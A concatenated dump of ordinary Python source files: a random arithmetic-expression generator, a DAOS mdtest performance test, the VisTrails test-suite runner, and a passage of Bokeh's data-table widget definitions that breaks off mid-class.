py | b40400d0dfe8f574445524ffc0d745ea4f2aaaf6 | import random
from mathexpr import AddOperation, SubOperation, MulOperation, DivOperation,\
Constant, EvalContext
_OPERATIONS = (AddOperation, SubOperation, MulOperation, DivOperation)
def _generate_branch(rem_depth, const_range=(-5, 5)):
if rem_depth <= 0:
return None
if rem_depth == 1:
return Constant(random.randint(*const_range))
else:
new_rem_depth = rem_depth - 1
left = _generate_branch(new_rem_depth)
right = _generate_branch(new_rem_depth)
operation = random.choice(_OPERATIONS)(left, right)
return operation
def generate_expressions(count, depth):
for _ in range(count):
done = False
while not done:
expr = _generate_branch(depth)
try:
expr.eval()
except (ZeroDivisionError, OverflowError):
pass
else:
done = True
yield expr
if __name__ == '__main__':
context = EvalContext(dec_places=0, n_spaces=1)
n_expressions = 10
depth = 5
for expr in generate_expressions(n_expressions, depth):
print(f'{expr.as_str(context)} = {expr.eval(context)}')
|
py | b4040368b1ab1a7b6aba5add08a3d63e601bb68c | #!/usr/bin/python
'''
(C) Copyright 2019-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
'''
from mdtest_test_base import MdtestBase
class MdtestLarge(MdtestBase):
# pylint: disable=too-many-ancestors
"""
Class for mdtest with large configurations
:avocado: recursive
"""
def test_mdtest_large(self):
"""
Jira ID: DAOS-2494
Test Description:
Test Mdtest for large config.
Use Cases:
Aim of this test is to test different combinations
of following configs for performance purpose:
Servers: 1 | 8
Clients: 1 | 64 | 128
num of files/dirs: 10000
iter: 3
with/without unique working dir for each task
write bytes: 0 | 1K | 32K
read bytes: 0 | 1K | 32K
depth of hierarchical directory structure: 0 | 100
:avocado: tags=all
:avocado: tags=hw
:avocado: tags=perf,nvme,mdtest,checksum
:avocado: tags=mdtestlarge
"""
mdtest_flags = self.params.get("flags", "/run/mdtest/*")
self.mdtest_cmd.flags.update(mdtest_flags)
self.execute_mdtest()
|
py | b4040481f38ec6c33e94661eeab32de6d2dddde8 | #!/usr/bin/env python
# pragma: no testimport
###############################################################################
##
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
"""Runs all tests available in VisTrails modules by importing all of
them, stealing the classes that look like unit tests, and running
all of them.
runtestsuite.py also reports all VisTrails modules that don't export
any unit tests, as a crude measure of code coverage.
"""
import atexit
from distutils.version import LooseVersion
#import doctest
import locale
import os
import sys
import traceback
import os.path
import optparse
from optparse import OptionParser
import platform
import re
import shutil
import tempfile
# Makes sure we can import modules as if we were running VisTrails
# from the root directory
_this_dir = os.path.dirname(os.path.realpath(__file__))
root_directory = os.path.realpath(os.path.join(_this_dir, '..'))
sys.path.insert(0, os.path.realpath(os.path.join(root_directory, '..')))
# Use a different temporary directory
test_temp_dir = tempfile.mkdtemp(prefix='vt_testsuite_')
tempfile.tempdir = test_temp_dir
@apply
class clean_tempdir(object):
def __init__(self):
atexit.register(self.clean)
self.listdir = os.listdir
self.isdir = os.path.isdir
self.test_temp_dir = test_temp_dir
self.rmtree = shutil.rmtree
self.out = sys.stdout.write
def clean(self):
nb_dirs = 0
nb_files = 0
for f in self.listdir(self.test_temp_dir):
if self.isdir(f):
nb_dirs += 1
else:
nb_files += 1
if nb_dirs > 0 or nb_files > 0:
self.out("Warning: %d dirs and %d files were left behind in "
"tempdir, cleaning up\n" % (nb_dirs, nb_files))
self.rmtree(self.test_temp_dir, ignore_errors=True)
def setNewPyQtAPI():
try:
import sip
# We now use the new PyQt API - IPython needs it
sip.setapi('QString', 2)
sip.setapi('QVariant', 2)
except Exception:
print "Could not set PyQt API, is PyQt4 installed?"
setNewPyQtAPI()
import vistrails.tests
import vistrails.core
import vistrails.core.db.io
import vistrails.core.db.locator
from vistrails.core import debug
import vistrails.gui.application
from vistrails.core.system import vistrails_root_directory, \
vistrails_examples_directory
# VisTrails does funny stuff with unittest/unittest2, be sure to load that
# after vistrails
import unittest
###############################################################################
# Testing Examples
EXAMPLES_PATH = vistrails_examples_directory()
#dictionary of examples that will be run with the workflows that will be ignored
VT_EXAMPLES = { 'EMBOSS_webservices.vt': ["ProphetOutput"],
'KEGGPathway.vt': [],
'KEGG_SearchEntities_webservice.vt': [],
'KEGG_webservices.vt': [],
'brain_vistrail.vt': [],
'chebi_webservice.vt': [],
'head.vt': [],
'infovis.vt': [],
'noaa_webservices.vt': [],
'offscreen.vt': [],
'plot.vt': [],
'spx.vt': [],
'structure_or_id_webservice.vt': [],
'terminator.vt': ["Isosurface Script"],
'triangle_area.vt': [],
'vtk.vt': [],
'vtk_book_3rd_p189.vt': ["quadric", "SmapleFunction",
"Almost there"],
'vtk_book_3rd_p193.vt': ["modules", "connections",
"lookup table"],
'vtk_http.vt': [],
}
###############################################################################
# Utility
def sub_print(s, overline=False):
"""Prints line with underline (and optionally overline) ASCII dashes."""
if overline:
print "-" * len(s)
print s
print "-" * len(s)
###############################################################################
usage = "Usage: %prog [options] [module1 module2 ...]"
parser = OptionParser(usage=usage)
parser.add_option("-V", "--verbose", action="store", type="int",
default=0, dest="verbose",
help="set verboseness level(0--2, default=0, "
"higher means more verbose)")
parser.add_option("-e", "--examples", action="store_true",
default=False,
help="run vistrails examples")
parser.add_option("-i", "--images", action="store_true",
default=False,
help="perform image comparisons")
parser.add_option("--installbundles", action='store_true',
default=False,
help=("Attempt to install missing Python packages "
"automatically"))
parser.add_option("-S", "--startup", action="store", type="str", default=None,
dest="dotVistrails",
help="Set startup file (default is temporary directory)")
parser.add_option('-L', '--locale', action='store', type='str', default='',
dest='locale',
help="set locale to this string")
parser.add_option('-D', '--debug', action='store_true',
default=False,
help="start interactive debugger on unexpected error")
(options, args) = parser.parse_args()
# remove empty strings
args = filter(len, args)
verbose = options.verbose
locale.setlocale(locale.LC_ALL, options.locale or '')
test_examples = options.examples
test_images = options.images
installbundles = options.installbundles
dotVistrails = options.dotVistrails
debug_mode = options.debug
test_modules = None
if len(args) > 0:
test_modules = args
elif os.path.exists(EXAMPLES_PATH):
test_images = True
def module_filter(name):
if test_modules is None:
return True
for mod in test_modules:
if name.startswith(mod):
return True
return False
###############################################################################
# reinitializing arguments and options so VisTrails does not try parsing them
sys.argv = sys.argv[:1]
# creates the app so that testing can happen
# We need the windows so we can test events, etc.
optionsDict = {
'interactiveMode': True,
'nologger': True,
'singleInstance': False,
'fixedSpreadsheetCells': True,
'installBundles': installbundles,
'enablePackagesSilently': True,
'handlerDontAsk': True,
'developperDebugger': debug_mode,
}
if dotVistrails:
optionsDict['dotVistrails'] = dotVistrails
else:
optionsDict['spawned'] = True
v = vistrails.gui.application.start_application(optionsDict)
if v != 0:
app = vistrails.gui.application.get_vistrails_application()
if app:
app.finishSession()
sys.exit(v)
# disable first vistrail
app = vistrails.gui.application.get_vistrails_application()
app.builderWindow.auto_view = False
app.builderWindow.close_all_vistrails(True)
print "Test Suite for VisTrails"
print "Locale settings: %s" % ', '.join('%s: %s' % (s, locale.setlocale(getattr(locale, s), None)) for s in ('LC_ALL', 'LC_TIME'))
print "Running on %s" % ', '.join(platform.uname())
print "Python is %s" % sys.version
try:
from PyQt4 import QtCore
print "Using PyQt4 %s with Qt %s" % (QtCore.PYQT_VERSION_STR, QtCore.qVersion())
except ImportError:
print "PyQt4 not available"
for pkg in ('numpy', 'scipy', 'matplotlib'):
try:
ipkg = __import__(pkg, globals(), locals(), [], -1)
print "Using %s %s" % (pkg, ipkg.__version__)
except ImportError:
print "%s not available" % pkg
try:
import vtk
print "Using vtk %s" % vtk.vtkVersion().GetVTKVersion()
except ImportError:
print "vtk not available"
print ""
tests_passed = True
main_test_suite = unittest.TestSuite()
test_loader = unittest.TestLoader()
import_skip_regex = re.compile(r'(?i)# *pragma[: ]*no *testimport')
if test_modules:
sub_print("Trying to import some of the modules")
else:
sub_print("Trying to import all modules")
for (p, subdirs, files) in os.walk(root_directory):
# skip subversion subdirectories
if p.find('.svn') != -1 or p.find('.git') != -1 :
continue
for filename in files:
# skip files that don't look like VisTrails python modules
if not filename.endswith('.py'):
continue
module_file = os.path.join(p, filename)
module = os.path.join("vistrails", p[len(root_directory)+1:],
filename[:-3])
if (module.startswith(os.sep) or
('#' in module)):
continue
# use qualified import names with periods instead of
# slashes to avoid duplicates in sys.modules
module = module.replace('/','.')
module = module.replace('\\','.')
if module.endswith('__init__'):
module = module[:-9]
if not module_filter(module):
continue
if module.startswith('vistrails.tests.resources'):
continue
if ('.system.' in module and not
module.endswith('__init__')):
continue
with open(module_file) as fp:
l = fp.readline()
if l.startswith('#!'): # shebang
l = fp.readline()
if import_skip_regex.match(l):
if verbose >= 1:
print >>sys.stderr, ("Skipping %s, not an importable "
"module" % module)
continue
m = None
try:
if '.' in module:
m = __import__(module, globals(), locals(), ['foo'])
else:
m = __import__(module)
except BaseException:
print >>sys.stderr, "ERROR: Could not import module: %s" % module
if verbose >= 1:
traceback.print_exc(file=sys.stderr)
continue
# Load the unittest TestCases
suite = test_loader.loadTestsFromModule(m)
# Load the doctests
#try:
# suite.addTests(doctest.DocTestSuite(m))
#except ValueError:
# pass # No doctest is fine, we check that some tests exist later
# The doctests are currently opt-in; a load_tests method can be
# defined to build a DocTestSuite
# This is because some modules have interpreter-formatted examples that
# are NOT doctests, and because mining the codebase for doctests is
# painfully slow
main_test_suite.addTests(suite)
if suite.countTestCases() == 0 and verbose >= 1:
print >>sys.stderr, "WARNING: module has no tests: %s" % module
elif verbose >= 2:
print >>sys.stderr, "OK: module as %d test cases: %s" % (
suite.countTestCases(),
module)
sub_print("Imported modules. Running %d tests%s..." % (
main_test_suite.countTestCases(),
", and thumbnails comparison" if test_images else ''),
overline=True)
############## TEST VISTRAIL IMAGES ####################
# Compares thumbnails with the generated images to detect broken visualizations
image_tests = [("terminator.vt", [("terminator_isosurface", "Isosurface"),
("terminator_VRSW", "Volume Rendering SW"),
("terminator_CPSW", "Clipping Plane SW"),
("terminator_CRSW", "Combined Rendering SW"),
("terminator_ISSW", "Image Slices SW")])
]
compare_use_vtk = False
try:
import vtk
if LooseVersion(vtk.vtkVersion().GetVTKVersion()) >= LooseVersion('5.8.0'):
compare_use_vtk = True
except ImportError:
pass
if compare_use_vtk:
def compare_thumbnails(prev, next):
#vtkImageDifference assumes RGB, so strip alpha
def removeAlpha(file):
freader = vtk.vtkPNGReader()
freader.SetFileName(file)
removealpha = vtk.vtkImageExtractComponents()
removealpha.SetComponents(0,1,2)
removealpha.SetInputConnection(freader.GetOutputPort())
removealpha.Update()
return removealpha.GetOutput()
#do the image comparison
a = removeAlpha(prev)
b = removeAlpha(next)
idiff = vtk.vtkImageDifference()
idiff.SetInput(a)
idiff.SetImage(b)
idiff.Update()
return idiff.GetThresholdedError()
else:
try:
from scipy.misc import imread
except ImportError:
imread = None
if test_images:
print "Warning: old VTK version detected, NOT comparing thumbnails"
if imread is not None:
def compare_thumbnails(prev, next):
prev_img = imread(prev)
next_img = imread(next)
assert len(prev_img.shape) == 3
assert len(next_img.shape) == 3
if prev_img.shape[:2] == next_img.shape[:2]:
return 0
else:
return float('Inf')
else:
def compare_thumbnails(prev, next):
if os.path.isfile(prev) and os.path.isfile(next):
return 0
else:
return float('Inf')
def image_test_generator(vtfile, version):
from vistrails.core.db.locator import FileLocator
from vistrails.core.db.io import load_vistrail
import vistrails.core.console_mode
def test(self):
try:
errs = []
filename = os.path.join(EXAMPLES_PATH, vtfile)
locator = FileLocator(os.path.abspath(filename))
(v, abstractions, thumbnails, mashups) = load_vistrail(locator)
errs = vistrails.core.console_mode.run(
[(locator, version)],
update_vistrail=False,
extra_info={'compare_thumbnails': compare_thumbnails})
if len(errs) > 0:
for err in errs:
print(" *** Error in %s:%s:%s -- %s" % err)
self.fail(str(err))
except Exception, e:
self.fail(debug.format_exception(e))
return test
class TestVistrailImages(unittest.TestCase):
pass
if test_images:
for vt, t in image_tests:
for name, version in t:
test_name = 'test_%s' % name
test = image_test_generator(vt, version)
setattr(TestVistrailImages, test_name, test)
main_test_suite.addTest(TestVistrailImages(test_name))
############## RUN TEST SUITE ####################
class TestResult(unittest.TextTestResult):
def addSkip(self, test, reason):
self.stream.writeln("skipped '{0}': {1}".format(str(test), reason))
super(TestResult, self).addSkip(test, reason)
runner = unittest.TextTestRunner(
verbosity=max(verbose, 1),
resultclass=TestResult)
result = runner.run(main_test_suite)
if not result.wasSuccessful():
tests_passed = False
sub_print("Tests finished.", overline=True)
if test_examples:
import vistrails.core.console_mode
sub_print("Testing examples:")
summary = {}
nworkflows = 0
nvtfiles = 0
for vtfile in VT_EXAMPLES.keys():
try:
errs = []
filename = os.path.join(EXAMPLES_PATH,
vtfile)
print filename
locator = vistrails.core.db.locator.FileLocator(os.path.abspath(filename))
(v, abstractions, thumbnails, mashups) = vistrails.core.db.io.load_vistrail(locator)
w_list = []
for version,tag in v.get_tagMap().iteritems():
if tag not in VT_EXAMPLES[vtfile]:
w_list.append((locator,version))
nworkflows += 1
if len(w_list) > 0:
errs = vistrails.core.console_mode.run(w_list, update_vistrail=False)
summary[vtfile] = errs
except Exception, e:
errs.append((vtfile,"None", "None", debug.format_exception(e)))
summary[vtfile] = errs
nvtfiles += 1
print "-" * 79
print "Summary of Examples: %s workflows in %s vistrail files" % (
nworkflows, nvtfiles)
print ""
errors = False
for vtfile, errs in summary.iteritems():
print vtfile
if len(errs) > 0:
for err in errs:
print(" *** Error in %s:%s:%s -- %s" % err)
errors = True
else:
print " Ok."
print "-" * 79
if errors:
tests_passed = False
sub_print("There were errors. See summary for more information")
else:
sub_print("Examples ran successfully.")
vistrails.gui.application.get_vistrails_application().finishSession()
vistrails.gui.application.stop_application()
# Test Runners can use the return value to know if the tests passed
sys.exit(0 if tests_passed else 1)
|
py | b40406afc756f1a14260a691f1d90e34974859f4 | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Various kinds of data table (data grid) widgets.
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from ...core.enums import (
DateFormat,
FontStyle,
NumeralLanguage,
RoundingFunction,
TextAlign,
)
from ...core.has_props import abstract
from ...core.properties import (
Bool,
Color,
Either,
Enum,
Float,
Instance,
Int,
List,
Override,
Seq,
String,
)
from ...model import Model
from ..sources import CDSView, DataSource
from .widget import Widget
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'AvgAggregator',
'BooleanFormatter',
'CellFormatter',
'CellEditor',
'CheckboxEditor',
'CompositeFormatter',
'DataCube',
'DataTable',
'DateEditor',
'DateFormatter',
'GroupingInfo',
'HTMLTemplateFormatter',
'IntEditor',
'MaxAggregator',
'MinAggregator',
'NumberEditor',
'NumberFormatter',
'PercentEditor',
'ScientificFormatter',
'SelectEditor',
'StringEditor',
'StringFormatter',
'SumAggregator',
'TableColumn',
'TableWidget',
'TextEditor',
'TimeEditor',
)
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
@abstract
class CellFormatter(Model):
''' Abstract base class for data table's cell formatters.
'''
@abstract
class CellEditor(Model):
''' Abstract base class for data table's cell editors.
'''
@abstract
class RowAggregator(Model):
''' Abstract base class for data cube's row formatters.
'''
field_ = String('', help="""
Refers to the table column being aggregated
""")
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class StringFormatter(CellFormatter):
''' Basic string cell formatter.
'''
font_style = Enum(FontStyle, default="normal", help="""
An optional text font style, e.g. bold, italic.
""")
text_align = Enum(TextAlign, default="left", help="""
An optional text align, i.e. left, center or right.
""")
text_color = Color(help="""
An optional text color. See :class:`bokeh.core.properties.Color` for
details.
""")
class ScientificFormatter(StringFormatter):
''' Display numeric values from continuous ranges as "basic numbers",
using scientific notation when appropriate by default.
'''
precision = Int(10, help="""
How many digits of precision to display.
""")
power_limit_high = Int(5, help="""
Limit the use of scientific notation to when::
log(x) >= power_limit_high
""")
power_limit_low = Int(-3, help="""
Limit the use of scientific notation to when::
log(x) <= power_limit_low
""")
class NumberFormatter(StringFormatter):
''' Number cell formatter.
'''
format = String("0,0", help="""
The number format, as defined in the following tables:
**NUMBERS**:
============ ============== ===============
Number Format String
============ ============== ===============
10000 '0,0.0000' 10,000.0000
10000.23 '0,0' 10,000
10000.23 '+0,0' +10,000
-10000 '0,0.0' -10,000.0
10000.1234 '0.000' 10000.123
10000.1234 '0[.]00000' 10000.12340
-10000 '(0,0.0000)' (10,000.0000)
-0.23 '.00' -.23
-0.23 '(.00)' (.23)
0.23 '0.00000' 0.23000
0.23 '0.0[0000]' 0.23
1230974 '0.0a' 1.2m
1460 '0 a' 1 k
-104000 '0a' -104k
1 '0o' 1st
52 '0o' 52nd
23 '0o' 23rd
100 '0o' 100th
============ ============== ===============
**CURRENCY**:
=========== =============== =============
Number Format String
=========== =============== =============
1000.234 '$0,0.00' $1,000.23
1000.2 '0,0[.]00 $' 1,000.20 $
1001 '$ 0,0[.]00' $ 1,001
-1000.234 '($0,0)' ($1,000)
-1000.234 '$0.00' -$1000.23
1230974 '($ 0.00 a)' $ 1.23 m
=========== =============== =============
**BYTES**:
=============== =========== ============
Number Format String
=============== =========== ============
100 '0b' 100B
2048 '0 b' 2 KB
7884486213 '0.0b' 7.3GB
3467479682787 '0.000 b' 3.154 TB
=============== =========== ============
**PERCENTAGES**:
============= ============= ===========
Number Format String
============= ============= ===========
1 '0%' 100%
0.974878234 '0.000%' 97.488%
-0.43 '0 %' -43 %
0.43 '(0.000 %)' 43.000 %
============= ============= ===========
**TIME**:
============ ============== ============
Number Format String
============ ============== ============
25 '00:00:00' 0:00:25
238 '00:00:00' 0:03:58
63846 '00:00:00' 17:44:06
============ ============== ============
For the complete specification, see http://numbrojs.com/format.html
""")
language = Enum(NumeralLanguage, default="en", help="""
The language to use for formatting language-specific features (e.g. thousands separator).
""")
rounding = Enum(RoundingFunction, help="""
Rounding functions (round, floor, ceil) and their synonyms (nearest, rounddown, roundup).
""")
class BooleanFormatter(CellFormatter):
''' Boolean (check mark) cell formatter.
'''
icon = Enum('check', 'check-circle', 'check-circle-o', 'check-square', 'check-square-o', help="""
The icon visualizing the check mark.
""")
class CompositeFormatter(CellFormatter):
'''CompositeFormatter applies multiple formatters to a single TableColumn
Example:
.. code-block:: python
example_formatter = CompositeFormatter(formatters=[StringFormatter(font_style="bold"), HTMLTemplateFormatter(
template='<code><%= value %></code>')])
TableColumn(field='Part ID', title='Part ID', formatter=example_formatter, ...)
'''
formatters = Seq(Instance(CellFormatter, help="""
The CompositeFormatter class may be used with any combination of
the installed formatters in the Bokeh library to apply multiple
formatting capabilities (BooleanFormatter, CellFormatter, DateFormatter,
HTMLTemplateFormatter, NumberFormatter, ScientificFormatter, StringFormatter,
to a single TableColumn. Formatters will be implemented in the same order they appear
in the sequence.
"""))
class DateFormatter(CellFormatter):
''' Date cell formatter.
'''
format = Either(Enum(DateFormat), String, default='ISO-8601', help="""
The date format can be any standard `strftime`_ format string, as well
as any of the following predefined format names:
================================================ ================== ===================
Format name(s) Format string Example Output
================================================ ================== ===================
``ATOM`` / ``W3C`` / ``RFC-3339`` / ``ISO-8601`` ``"%Y-%m-%d"`` 2014-03-01
``COOKIE`` ``"%a, %d %b %Y"`` Sat, 01 Mar 2014
``RFC-850`` ``"%A, %d-%b-%y"`` Saturday, 01-Mar-14
``RFC-1123`` / ``RFC-2822`` ``"%a, %e %b %Y"`` Sat, 1 Mar 2014
``RSS`` / ``RFC-822`` / ``RFC-1036`` ``"%a, %e %b %y"`` Sat, 1 Mar 14
``TIMESTAMP`` (ms since epoch) 1393632000000
================================================ ================== ===================
Note that in the table some of the format names are synonymous, with
identical format names separated by slashes.
This list of supported `strftime`_ format codes is reproduced below.
%a
The abbreviated name of the day of the week according to the
current locale.
%A
The full name of the day of the week according to the current
locale.
%b
The abbreviated month name according to the current locale.
%B
The full month name according to the current locale.
%c
The preferred date and time representation for the current
locale.
%C
The century number (year/100) as a 2-digit integer.
%d
The day of the month as a decimal number (range 01 to 31).
%D
Equivalent to %m/%d/%y. (Americans should note that in many
other countries %d/%m/%y is rather common. This means that in
international context this format is ambiguous and should not
be used.)
%e
Like %d, the day of the month as a decimal number, but a
leading zero is replaced by a space.
%f
Microsecond as a decimal number, zero-padded on the left (range
000000-999999). This is an extension to the set of directives
available to `timezone`_.
%F
Equivalent to %Y-%m-%d (the ISO 8601 date format).
%G
The ISO 8601 week-based year with century as a decimal number.
The 4-digit year corresponding to the ISO week number (see %V).
This has the same format and value as %Y, except that if the
ISO week number belongs to the previous or next year, that year
is used instead.
%g
Like %G, but without century, that is, with a 2-digit year (00-99).
%h
Equivalent to %b.
%H
The hour as a decimal number using a 24-hour clock (range 00
to 23).
%I
The hour as a decimal number using a 12-hour clock (range 01
to 12).
%j
The day of the year as a decimal number (range 001 to 366).
%k
The hour (24-hour clock) as a decimal number (range 0 to 23).
Single digits are preceded by a blank. (See also %H.)
%l
The hour (12-hour clock) as a decimal number (range 1 to 12).
Single digits are preceded by a blank. (See also %I.) (TZ)
%m
The month as a decimal number (range 01 to 12).
%M
The minute as a decimal number (range 00 to 59).
%n
A newline character. Bokeh text does not currently support
newline characters.
%N
Nanosecond as a decimal number, zero-padded on the left (range
000000000-999999999). Supports a padding width specifier, i.e.
%3N displays 3 leftmost digits. However, this is only accurate
to the millisecond level of precision due to limitations of
`timezone`_.
%p
Either "AM" or "PM" according to the given time value, or the
corresponding strings for the current locale. Noon is treated
as "PM" and midnight as "AM".
%P
Like %p but in lowercase: "am" or "pm" or a corresponding
string for the current locale.
%r
The time in a.m. or p.m. notation. In the POSIX locale this
is equivalent to %I:%M:%S %p.
%R
The time in 24-hour notation (%H:%M). For a version including
the seconds, see %T below.
%s
The number of seconds since the Epoch, 1970-01-01 00:00:00
+0000 (UTC).
%S
The second as a decimal number (range 00 to 60). (The range
is up to 60 to allow for occasional leap seconds.)
%t
A tab character. Bokeh text does not currently support tab
characters.
%T
The time in 24-hour notation (%H:%M:%S).
%u
The day of the week as a decimal, range 1 to 7, Monday being 1.
See also %w.
%U
The week number of the current year as a decimal number, range
00 to 53, starting with the first Sunday as the first day of
week 01. See also %V and %W.
%V
The ISO 8601 week number (see NOTES) of the current year as a
decimal number, range 01 to 53, where week 1 is the first week
that has at least 4 days in the new year. See also %U and %W.
%w
The day of the week as a decimal, range 0 to 6, Sunday being 0.
See also %u.
%W
The week number of the current year as a decimal number, range
00 to 53, starting with the first Monday as the first day of
week 01.
%x
The preferred date representation for the current locale
without the time.
%X
The preferred time representation for the current locale
without the date.
%y
The year as a decimal number without a century (range 00 to 99).
%Y
The year as a decimal number including the century.
%z
The +hhmm or -hhmm numeric timezone (that is, the hour and
minute offset from UTC).
%Z
The timezone name or abbreviation.
%%
A literal '%' character.
.. warning::
The client library BokehJS uses the `timezone`_ library to
format datetimes. The inclusion of the list below is based on the
claim that `timezone`_ makes to support "the full compliment
of GNU date format specifiers." However, this claim has not
been tested exhaustively against this list. If you find formats
that do not function as expected, please submit a `github issue`_,
so that the documentation can be updated appropriately.
.. _strftime: http://man7.org/linux/man-pages/man3/strftime.3.html
.. _timezone: http://bigeasy.github.io/timezone/
.. _github issue: https://github.com/bokeh/bokeh/issues
""")
class HTMLTemplateFormatter(CellFormatter):
''' HTML formatter using a template.
This uses Underscore's `template` method and syntax. http://underscorejs.org/#template
The formatter has access other items in the row via the `dataContext` object passed to the formatter.
So, for example, if another column in the datasource was named `url`, the template could access it as:
.. code-block:: jinja
<a href="<%= url %>"><%= value %></a>
To use a different set of template delimiters, pass the appropriate values for `evaluate`, `interpolate',
or `escape`. See the Underscore `template` documentation for more information. http://underscorejs.org/#template
Example: Simple HTML template to format the column value as code.
.. code-block:: python
HTMLTemplateFormatter(template='<code><%= value %></code>')
Example: Use values from other columns (`manufacturer` and `model`) to build a hyperlink.
.. code-block:: python
HTMLTemplateFormatter(template=
'<a href="https:/www.google.com/search?q=<%= manufacturer %>+<%= model %>" target="_blank"><%= value %></a>'
)
'''
template = String('<%= value %>', help="""
Template string to be used by Underscore's template method.
""")
class StringEditor(CellEditor):
''' Basic string cell editor with auto-completion.
'''
completions = List(String, help="""
An optional list of completion strings.
""")
class TextEditor(CellEditor):
''' Multi-line string cell editor.
'''
class SelectEditor(CellEditor):
''' Select cell editor.
'''
options = List(String, help="""
The list of options to select from.
""")
class PercentEditor(CellEditor):
''' ``IntEditor`` optimized for editing percentages.
'''
class CheckboxEditor(CellEditor):
''' Boolean value cell editor.
'''
class IntEditor(CellEditor):
''' Spinner-based integer cell editor.
'''
step = Int(1, help="""
The major step value.
""")
class NumberEditor(CellEditor):
''' Spinner-based number cell editor.
'''
step = Float(0.01, help="""
The major step value.
""")
class TimeEditor(CellEditor):
''' Spinner-based time cell editor.
'''
class DateEditor(CellEditor):
''' Calendar-based date cell editor.
'''
class AvgAggregator(RowAggregator):
''' Simple average across multiple rows.
'''
class MinAggregator(RowAggregator):
''' Smallest value across multiple rows.
'''
class MaxAggregator(RowAggregator):
''' Largest value across multiple rows.
'''
class SumAggregator(RowAggregator):
''' Simple sum across multiple rows.
'''
class TableColumn(Model):
''' Table column widget.
'''
field = String(help="""
The name of the field mapping to a column in the data source.
""")
title = String(help="""
The title of this column. If not set, column's data field is
used instead.
""")
width = Int(300, help="""
The width or maximum width (depending on data table's configuration)
in pixels of this column.
""")
formatter = Instance(CellFormatter, lambda: StringFormatter(), help="""
The cell formatter for this column. By default, a simple string
formatter is used.
""")
editor = Instance(CellEditor, lambda: StringEditor(), help="""
The cell editor for this column. By default, a simple string editor
is used.
""")
sortable = Bool(True, help="""
Whether this column is sortable or not. Note that data table has
to have sorting enabled to allow sorting in general.
""")
default_sort = Enum("ascending", "descending", help="""
The default sorting order. By default ``ascending`` order is used.
""")
@abstract
class TableWidget(Widget):
''' Abstract base class for data table (data grid) widgets.
'''
source = Instance(DataSource, help="""
The source of data for the widget.
""")
view = Instance(CDSView, help="""
A view into the data source to use when rendering table rows. A default view
of the entire data source is created if a view is not passed in during
initialization.
""")
def __init__(self, **kw):
super().__init__(**kw)
if "view" not in kw:
self.view = CDSView(source=self.source)
class DataTable(TableWidget):
''' Two dimensional grid for visualisation and editing large amounts
of data.
'''
columns = List(Instance(TableColumn), help="""
The list of child column widgets.
""")
fit_columns = Bool(True, help="""
Whether columns should be fit to the available width. This results in no
horizontal scrollbar showing up, but data can get unreadable if there is
no enough space available. If set to ``True``, columns' width is
understood as maximum width.
""")
sortable = Bool(True, help="""
Allows to sort table's contents. By default natural order is preserved.
To sort a column, click on it's header. Clicking one more time changes
sort direction. Use Ctrl + click to return to natural order. Use
Shift + click to sort multiple columns simultaneously.
""")
reorderable = Bool(True, help="""
Allows the reordering of a table's columns. To reorder a column,
click and drag a table's header to the desired location in the table.
The columns on either side will remain in their previous order.
""")
editable = Bool(False, help="""
Allows to edit table's contents. Needs cell editors to be configured on
columns that are required to be editable.
""")
selectable = Either(Bool(True), Enum("checkbox"), help="""
Whether a table's rows can be selected or not. Using ``checkbox`` is
equivalent to ``True``, but makes selection visible through a checkbox
for each row, instead of highlighting rows. Multiple selection is
allowed and can be achieved by either clicking multiple checkboxes (if
enabled) or using Shift + click on rows.
""")
index_position = Int(0, help="""
Where among the list of columns to insert a column displaying the row
index. Negative indices are supported, and specify an index position
from the end of the list of columns (i.e. standard Python behaviour).
To prevent the index column from being added, set to None.
If the absolute value of index_position is larger than the length of
the columns, then the index will appear at the beginning or end, depending
on the sign.
""")
index_header = String("#", help="""
The column header to display for the index column, if it is present.
""")
index_width = Int(40, help="""
The width of the index column, if present.
""")
scroll_to_selection = Bool(True, help="""
Whenever a selection is made on the data source, scroll the selected
rows into the table's viewport if none of the selected rows are already
in the viewport.
""")
header_row = Bool(True, help="""
Whether to show a header row with column names at the top of the table.
""")
width = Override(default=600)
height = Override(default=400)
row_height = Int(25, help="""
The height of each row in pixels.
""")
class GroupingInfo(Model):
'''Describes how to calculate totals and sub-totals
'''
getter = String('', help="""
